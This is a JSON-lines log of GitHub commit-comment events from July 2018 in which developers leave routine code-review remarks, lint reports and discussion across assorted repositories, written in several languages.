{"id":"8000227715","type":"CommitCommentEvent","actor":{"login":"burtbai"},"repo":{"name":"pypa/pip"},"payload":{"comment":{"id":29792534,"position":4,"line":10,"path":"NEWS.rst","commit_id":"43fe0c1e70ff25dd25f89f367ab9dfd82a728162","created_at":"2018-07-22T13:32:56Z","updated_at":"2018-07-22T13:32:56Z","author_association":"NONE","body":"should 18.0.0! 要符合https://semver.org"}},"created_at":"2018-07-22T13:32:56Z"}
{"id":"8000227803","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792535,"position":null,"line":null,"path":null,"commit_id":"5484db1879649aaf7b330c175085f201a0c050ec","created_at":"2018-07-22T13:33:00Z","updated_at":"2018-07-22T13:33:00Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:00Z"}
{"id":"8000227926","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792536,"position":null,"line":null,"path":null,"commit_id":"e2f08043852065d55f52f941521c65676062a377","created_at":"2018-07-22T13:33:06Z","updated_at":"2018-07-22T13:33:06Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:06Z"}
{"id":"8000228096","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792537,"position":null,"line":null,"path":null,"commit_id":"c1d6c0025c3833f0733124ad57de43a3a3ecf83b","created_at":"2018-07-22T13:33:13Z","updated_at":"2018-07-22T13:33:13Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:13Z"}
{"id":"8000228246","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792538,"position":null,"line":null,"path":null,"commit_id":"b0e8ccf82ffc072a1b55c0f93120a5168cda555d","created_at":"2018-07-22T13:33:19Z","updated_at":"2018-07-22T13:33:19Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:19Z"}
{"id":"8000228424","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792539,"position":null,"line":null,"path":null,"commit_id":"ed014543d5bc7a5d31e1a8755c00ff6946daf95b","created_at":"2018-07-22T13:33:25Z","updated_at":"2018-07-22T13:33:25Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:25Z"}
{"id":"8000228496","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792540,"position":17,"line":13,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:33:28Z","updated_at":"2018-07-22T13:33:28Z","author_association":"NONE","body":"в 12 и 13 строках табы, нужно поменять на пробелы"}},"created_at":"2018-07-22T13:33:28Z"}
{"id":"8000228540","type":"CommitCommentEvent","actor":{"login":"Haorou"},"repo":{"name":"Haorou/OpenClassroom"},"payload":{"comment":{"id":29792541,"position":null,"line":null,"path":null,"commit_id":"fb5c6ca6074a8df427f3d8e5a25e2deac1b50898","created_at":"2018-07-22T13:33:30Z","updated_at":"2018-07-22T13:33:30Z","author_association":"OWNER","body":"Test merge (Pas partie de l'exercice, navré :/)"}},"created_at":"2018-07-22T13:33:30Z"}
{"id":"8000228727","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792542,"position":23,"line":19,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:33:39Z","updated_at":"2018-07-22T13:33:39Z","author_association":"NONE","body":"пробел перед запятой не нужен (после `month`)"}},"created_at":"2018-07-22T13:33:39Z"}
{"id":"8000228951","type":"CommitCommentEvent","actor":{"login":"thundo811"},"repo":{"name":"thundo811/projecttest"},"payload":{"comment":{"id":29792543,"position":11,"line":14,"path":"FinalProject/src/main/java/com/dxc/controller/MainController.java","commit_id":"81b4c4297dcb763be98887a0c68c1a664834a10a","created_at":"2018-07-22T13:33:49Z","updated_at":"2018-07-22T13:33:49Z","author_association":"OWNER","body":"redict to page 404 not found"}},"created_at":"2018-07-22T13:33:49Z"}
{"id":"8000235055","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792545,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-22T13:38:08Z","updated_at":"2018-07-22T13:38:08Z","author_association":"OWNER","body":"- hi \n - bbbbb"}},"created_at":"2018-07-22T13:38:08Z"}
{"id":"8000235908","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792547,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T13:38:44Z","updated_at":"2018-07-22T13:38:44Z","author_association":"OWNER","body":"### ------------------------------- Detekt Issues ☠️ -------------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L18)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L26)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L28)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L33)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L26)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L38)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n"}},"created_at":"2018-07-22T13:38:44Z"}
{"id":"8000236136","type":"CommitCommentEvent","actor":{"login":"Everton1997"},"repo":{"name":"Everton1997/php"},"payload":{"comment":{"id":29792548,"position":null,"line":null,"path":null,"commit_id":"38c9048d068c398df7f446f0db7b466b2cb2417e","created_at":"2018-07-22T13:38:55Z","updated_at":"2018-07-22T13:38:55Z","author_association":"OWNER","body":"Arquivos PHP do curso de Arduino modulo 2"}},"created_at":"2018-07-22T13:38:55Z"}
{"id":"8000236445","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29792549,"position":null,"line":null,"path":null,"commit_id":"085841fd233c7d1f10c11ced7244401a68df4f8c","created_at":"2018-07-22T13:39:08Z","updated_at":"2018-07-22T13:39:08Z","author_association":"CONTRIBUTOR","body":"It does not create breaking changes, does not create confusion for users. Maybe it's a stupid code duplication, but good enough for workaround when you work on deprecated technology."}},"created_at":"2018-07-22T13:39:08Z"}
{"id":"8000238856","type":"CommitCommentEvent","actor":{"login":"Derriick"},"repo":{"name":"racer-rust/racer"},"payload":{"comment":{"id":29792551,"position":19,"line":30,"path":"README.md","commit_id":"e013374b4fed41c41b358e47a4f52370c44be560","created_at":"2018-07-22T13:40:55Z","updated_at":"2018-07-22T13:40:55Z","author_association":"NONE","body":"[make](http://www.gnu.org/software/make) package is needed too on Linux to build and install racer with Cargo (tested on Void Linux)"}},"created_at":"2018-07-22T13:40:55Z"}
{"id":"8000239139","type":"CommitCommentEvent","actor":{"login":"hfishdigksdfg"},"repo":{"name":"hfishdigksdfg/Test-Website"},"payload":{"comment":{"id":29792553,"position":2,"line":2,"path":".github/ISSUE_TEMPLATE/bug_report.md","commit_id":"370b29a86cecc9859c2609906722cfb47d91c2c2","created_at":"2018-07-22T13:41:08Z","updated_at":"2018-07-22T13:41:08Z","author_association":"OWNER","body":"Good thing"}},"created_at":"2018-07-22T13:41:08Z"}
{"id":"8000239782","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792555,"position":7,"line":4,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:41:35Z","updated_at":"2018-07-22T13:41:35Z","author_association":"NONE","body":"это решение лучше предыдущего, полностью рабочий вариант\r\nдля расширения кругозора:  \r\nеще можно было использовать метод `step` из класса `Range`\r\nтогда запись будет еще более короткая и может быть даже более читаемая:\r\n```ruby\r\n(10..100).step(5).to_a\r\n```"}},"created_at":"2018-07-22T13:41:35Z"}
{"id":"8000240422","type":"CommitCommentEvent","actor":{"login":"vakau"},"repo":{"name":"muellni/ice-adapter"},"payload":{"comment":{"id":29792558,"position":49,"line":38,"path":"PeerConnectivityChecker.cpp","commit_id":"df8add15e570e90079f548a224fbd4492974ca1a","created_at":"2018-07-22T13:42:02Z","updated_at":"2018-07-22T13:42:02Z","author_association":"NONE","body":"May also be renamed to \"connectivityLostAssumptionTime\""}},"created_at":"2018-07-22T13:42:02Z"}
{"id":"8000241081","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792560,"position":7,"line":4,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:42:28Z","updated_at":"2018-07-22T13:42:28Z","author_association":"NONE","body":"нужно убрать лишние пробелы в началах строк 2 - 4\r\nкод нужно начинать без пустого пространства перед ним"}},"created_at":"2018-07-22T13:42:28Z"}
{"id":"8000242867","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29792562,"position":null,"line":null,"path":null,"commit_id":"085841fd233c7d1f10c11ced7244401a68df4f8c","created_at":"2018-07-22T13:43:43Z","updated_at":"2018-07-22T13:43:43Z","author_association":"CONTRIBUTOR","body":"The breaking change is tiny & easy to fix even without a hint (it's just an extra parameter). And there will be only one implementation of this class in the project, so I can live with that. And it's on deprecated technology. :-)\r\n\r\nI think that the code duplication is much bigger issue than a tiny breaking change - we had many of them in the past. \r\n\r\nLet's discuss it in person when you have time."}},"created_at":"2018-07-22T13:43:43Z"}
{"id":"8000242895","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792563,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T13:43:44Z","updated_at":"2018-07-22T13:43:44Z","author_association":"OWNER","body":"### ------------------------------- Detekt Issues ☠️ -------------------------------\n"}},"created_at":"2018-07-22T13:43:44Z"}
{"id":"8000243204","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"PartialDev/flarum-design"},"payload":{"comment":{"id":29792564,"position":null,"line":null,"path":null,"commit_id":"5188da6c04e91143b45c30076fbf74f86dfaa45a","created_at":"2018-07-22T13:43:57Z","updated_at":"2018-07-22T13:43:57Z","author_association":"COLLABORATOR","body":"Can you try this and tell me how is it?"}},"created_at":"2018-07-22T13:43:57Z"}
{"id":"8000243531","type":"CommitCommentEvent","actor":{"login":"vakau"},"repo":{"name":"muellni/ice-adapter"},"payload":{"comment":{"id":29792565,"position":67,"line":53,"path":"PeerConnectivityChecker.cpp","commit_id":"df8add15e570e90079f548a224fbd4492974ca1a","created_at":"2018-07-22T13:44:11Z","updated_at":"2018-07-22T13:44:11Z","author_association":"NONE","body":"Correct"}},"created_at":"2018-07-22T13:44:11Z"}
{"id":"8000245652","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"lilydjwg/nvchecker"},"payload":{"comment":{"id":29792573,"position":5,"line":21,"path":"setup.py","commit_id":"00f7dccb399429cce9ee2068ef6ee7ca2bce0597","created_at":"2018-07-22T13:45:40Z","updated_at":"2018-07-22T13:45:40Z","author_association":"CONTRIBUTOR","body":"看來對於3.6和3.7，tornado 4和tornado 5都是可以用的。3.5不知出了什麼差錯 => #77"}},"created_at":"2018-07-22T13:45:40Z"}
{"id":"8000247763","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792576,"position":8,"line":2,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:47:12Z","updated_at":"2018-07-22T13:47:12Z","author_association":"NONE","body":"не рекомендуется ставить пробел после открывающей скобки и перед закрывающей (кроме фигурных скобок в случае хеша или блока):\r\n```ruby\r\n# bad\r\narray = [ 1, 2, 3 ]\r\na = ( 1 + 2 ) / 3\r\n%w( a e i)\r\nsome_method( arg )\r\n\r\n#good\r\narray = [1, 2, 3]\r\na = (1 + 2) / 3\r\n%w(a e i)\r\nsome_method(arg)\r\n```"}},"created_at":"2018-07-22T13:47:12Z"}
{"id":"8000247820","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29792577,"position":null,"line":null,"path":null,"commit_id":"bb990ad46e4120b26bb00731a74da3b5136e7fbc","created_at":"2018-07-22T13:47:14Z","updated_at":"2018-07-22T13:47:14Z","author_association":"COLLABORATOR","body":"Puzzle `733-0f01ea8f` discovered in   [`src/main/java/com/zerocracy/farm/StkSafe.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/farm/StkSafe.java)   and submitted as #1466. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-22T13:47:14Z"}
{"id":"8000248800","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792578,"position":16,"line":8,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:48:01Z","updated_at":"2018-07-22T13:48:01Z","author_association":"NONE","body":"в этом файле снова табы и код начинается не с начала строки, нужно поправить"}},"created_at":"2018-07-22T13:48:01Z"}
{"id":"8000248991","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"PartialDev/flarum-design"},"payload":{"comment":{"id":29792580,"position":null,"line":null,"path":null,"commit_id":"5188da6c04e91143b45c30076fbf74f86dfaa45a","created_at":"2018-07-22T13:48:09Z","updated_at":"2018-07-22T13:48:09Z","author_association":"COLLABORATOR","body":"This commit is kind of a cleanup of the background colors you added that looked bad if you ask me. I'm now going to be working on making elements rounder."}},"created_at":"2018-07-22T13:48:09Z"}
{"id":"8000249145","type":"CommitCommentEvent","actor":{"login":"iDroid27"},"repo":{"name":"iDroid27/homer"},"payload":{"comment":{"id":29792582,"position":null,"line":null,"path":null,"commit_id":"0b5bb45a8a41a3de7a56d34c65a076156f2bed6b","created_at":"2018-07-22T13:48:16Z","updated_at":"2018-07-22T13:48:16Z","author_association":"OWNER","body":"oof right"}},"created_at":"2018-07-22T13:48:16Z"}
{"id":"8000249942","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792584,"position":9,"line":4,"path":"Lesson2/l2_task4_fill_hash_vowel.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:48:51Z","updated_at":"2018-07-22T13:48:51Z","author_association":"NONE","body":"про квадратные скобки и пробелы написал выше"}},"created_at":"2018-07-22T13:48:51Z"}
{"id":"8000250620","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792586,"position":13,"line":8,"path":"Lesson2/l2_task4_fill_hash_vowel.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:49:22Z","updated_at":"2018-07-22T13:49:22Z","author_association":"NONE","body":"не нужно отступать код от начала строки"}},"created_at":"2018-07-22T13:49:22Z"}
{"id":"8000251043","type":"CommitCommentEvent","actor":{"login":"eukreign"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792587,"position":1,"line":1,"path":"lbrynet/daemon/auth/server.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:49:41Z","updated_at":"2018-07-22T13:49:41Z","author_association":"MEMBER","body":"If it passes pylint then you can remove the `skip-file`."}},"created_at":"2018-07-22T13:49:41Z"}
{"id":"8000254171","type":"CommitCommentEvent","actor":{"login":"dingtx000"},"repo":{"name":"dingtx000/Evolutionary-Algorithm"},"payload":{"comment":{"id":29792593,"position":10,"line":69,"path":"tutorial-contents/Genetic Algorithm/Travel Sales Person.py","commit_id":"151f22193db90b4c1c7738ef30b5bf3d15313ded","created_at":"2018-07-22T13:51:49Z","updated_at":"2018-07-22T13:51:49Z","author_association":"OWNER","body":"你好  测试"}},"created_at":"2018-07-22T13:51:49Z"}
{"id":"8000254192","type":"CommitCommentEvent","actor":{"login":"eukreign"},"repo":{"name":"lbryio/lbry"},"payload":{"comment":{"id":29792594,"position":10,"line":37,"path":"lbrynet/undecorated.py","commit_id":"fea1deb76d9cee6774fbe0a4b45c12bb787eef8f","created_at":"2018-07-22T13:51:50Z","updated_at":"2018-07-22T13:51:50Z","author_association":"MEMBER","body":"Preferably we remove the whole library, why are we stripping decorators from functions? Seems like a really bad architecture?"}},"created_at":"2018-07-22T13:51:50Z"}
{"id":"8000254490","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792595,"position":38,"line":18,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:52:03Z","updated_at":"2018-07-22T13:52:03Z","author_association":"NONE","body":"хорошее решение с интервалом и `each`\r\nзачет ))"}},"created_at":"2018-07-22T13:52:03Z"}
{"id":"8000255364","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792596,"position":36,"line":16,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:52:39Z","updated_at":"2018-07-22T13:52:39Z","author_association":"NONE","body":"лишние пробелы перед/после скобок"}},"created_at":"2018-07-22T13:52:39Z"}
{"id":"8000255927","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792599,"position":null,"line":null,"path":null,"commit_id":"9d45e83c1ae99a4583e972bf007ac67bcb3c6a97","created_at":"2018-07-22T13:53:04Z","updated_at":"2018-07-22T13:53:04Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L18)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L24)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L26)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L31)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L24)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/KotlinPresenter.kt#L36)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/9d45e83c1ae99a4583e972bf007ac67bcb3c6a97/Factory.kt#L11)\n"}},"created_at":"2018-07-22T13:53:04Z"}
{"id":"8000256231","type":"CommitCommentEvent","actor":{"login":"Blacksuan19"},"repo":{"name":"simrat39/android_vendor_lineage"},"payload":{"comment":{"id":29792601,"position":null,"line":null,"path":null,"commit_id":"71ade693598340f76160ce09179abc721321c596","created_at":"2018-07-22T13:53:17Z","updated_at":"2018-07-22T13:53:17Z","author_association":"NONE","body":"Wow very innovative"}},"created_at":"2018-07-22T13:53:17Z"}
{"id":"8000256232","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29792602,"position":15,"line":11,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"d96ff15220b81b68d2f28b6e74f974a42f2365e4","created_at":"2018-07-22T13:53:17Z","updated_at":"2018-07-22T13:53:17Z","author_association":"NONE","body":"В C# если тут будет пусто, то кидает какую ошибку? IndexOutOfBoundsException ?"}},"created_at":"2018-07-22T13:53:17Z"}
{"id":"8000258678","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"Qiangong2/android_device_samsung_jfltetmo"},"payload":{"comment":{"id":29792604,"position":null,"line":null,"path":null,"commit_id":"d560ab47f6756db646084693cc754a6fed23d933","created_at":"2018-07-22T13:54:59Z","updated_at":"2018-07-22T13:54:59Z","author_association":"NONE","body":"i cant make it build.can u contact me ? dkatikaridis@gmail.com"}},"created_at":"2018-07-22T13:54:59Z"}
{"id":"8000260339","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792608,"position":38,"line":18,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:56:13Z","updated_at":"2018-07-22T13:56:13Z","author_association":"NONE","body":"здесь: `|index|` пробелы также не нужны\r\nи было бы лучше назвать переменную как-то более \"специализированно\"\r\n`month` уже использовано, поэтому придется пофантазировать )\r\nнапример `month_number`"}},"created_at":"2018-07-22T13:56:13Z"}
{"id":"8000260850","type":"CommitCommentEvent","actor":{"login":"StephanEwen"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29792609,"position":81,"line":81,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/jobmanager/scheduler/CoLocationGroup.java","commit_id":"8231b62ff42aae53ca3a7b552980838ccab824ab","created_at":"2018-07-22T13:56:33Z","updated_at":"2018-07-22T13:56:33Z","author_association":"CONTRIBUTOR","body":"Looks redundant, I agree."}},"created_at":"2018-07-22T13:56:33Z"}
{"id":"8000261052","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29792610,"position":null,"line":null,"path":null,"commit_id":"a0834714bd1469623bb8d6f5a14791ad91aef37b","created_at":"2018-07-22T13:56:42Z","updated_at":"2018-07-22T13:56:42Z","author_association":"MEMBER","body":"//issuegenerator when?"}},"created_at":"2018-07-22T13:56:42Z"}
{"id":"8000261452","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29792611,"position":39,"line":19,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"f25c1f46d367a9fcf5b4057147171b3360870342","created_at":"2018-07-22T13:56:58Z","updated_at":"2018-07-22T13:56:58Z","author_association":"NONE","body":"в этом файле снова табуляции и код начинается не с начала строки\r\nнадо исправлять"}},"created_at":"2018-07-22T13:56:58Z"}
{"id":"8000262163","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29792614,"position":222,"line":222,"path":"Solutions5/Lists/LinkedList.cs","commit_id":"d96ff15220b81b68d2f28b6e74f974a42f2365e4","created_at":"2018-07-22T13:57:29Z","updated_at":"2018-07-22T13:57:29Z","author_association":"NONE","body":"Методы должны принимать в себя Object, а потом внутри этот object кастится в LinkedListNode\r\nЭто будет как раз полиморфизмом"}},"created_at":"2018-07-22T13:57:29Z"}
{"id":"8000264591","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29792619,"position":null,"line":null,"path":null,"commit_id":"a0834714bd1469623bb8d6f5a14791ad91aef37b","created_at":"2018-07-22T13:58:56Z","updated_at":"2018-07-22T13:58:56Z","author_association":"MEMBER","body":"When you write the backend like your promised\r\n![jhgt6omlil](https://user-images.githubusercontent.com/8843386/43046374-1a574a36-8dc8-11e8-934a-5085c9518f91.png)\r\n"}},"created_at":"2018-07-22T13:58:56Z"}
{"id":"8000265062","type":"CommitCommentEvent","actor":{"login":"pfmoore"},"repo":{"name":"pypa/pep517"},"payload":{"comment":{"id":29792620,"position":13,"line":121,"path":"pep517/wrappers.py","commit_id":"6261bd944d6c414b6b37b92c1a414bf15bee0ed7","created_at":"2018-07-22T13:59:14Z","updated_at":"2018-07-22T13:59:14Z","author_association":"MEMBER","body":"I encoded late deliberately, on the \"use Unicode internally, encode/decode at the boundaries\" principle. In this case the boundary between our code and the `check_call` system call.\r\n\r\nActually, it wasn't so much \"deliberate\" as \"natural\" - I'm sufficiently used to fighting with Unicode that I follow that pattern without thinking :-)"}},"created_at":"2018-07-22T13:59:14Z"}
{"id":"8000265185","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29792621,"position":null,"line":null,"path":null,"commit_id":"085841fd233c7d1f10c11ced7244401a68df4f8c","created_at":"2018-07-22T13:59:19Z","updated_at":"2018-07-22T13:59:19Z","author_association":"CONTRIBUTOR","body":"> The breaking change is tiny & easy to fix even without a hint (it's just an extra parameter).\r\n\r\nOne parameter would be the change of dispose method in view model loader (and I think it's unnecessary, but whatever). Here we are going to remove entire interface (that is documented) when the service provider is fixed on OWIN and the migration to service provide might require installation of some package, create custom implementation of `IServiceProvider` (with request-scopes) or some similar non-trivial change. So I think that if we want to do that in a minor version, it should be at least deprecated from the beginning.\r\n"}},"created_at":"2018-07-22T13:59:19Z"}
